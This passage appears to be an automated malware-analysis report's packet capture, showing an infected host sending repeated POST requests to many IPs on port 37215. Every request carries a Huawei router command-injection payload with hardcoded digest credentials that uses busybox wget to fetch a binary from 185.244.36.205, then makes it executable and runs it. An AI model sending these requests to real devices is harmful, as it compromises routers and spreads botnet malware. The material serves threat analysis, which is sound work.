                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1951192.168.2.1533768181.104.142.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.085292101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1952192.168.2.1558864197.12.156.19737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.085519075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1953192.168.2.1541938102.64.2.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.085844040 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1954192.168.2.154181441.59.57.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.086483002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1955192.168.2.1538770190.158.93.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.086533070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1956192.168.2.1541998192.5.60.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.086539984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1957192.168.2.1550538138.125.225.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.087058067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1958192.168.2.153918694.16.66.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.087214947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1959192.168.2.1544202222.246.251.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.087265015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1960192.168.2.153529894.63.31.3737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.087713957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1961192.168.2.154104637.178.170.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.088207960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
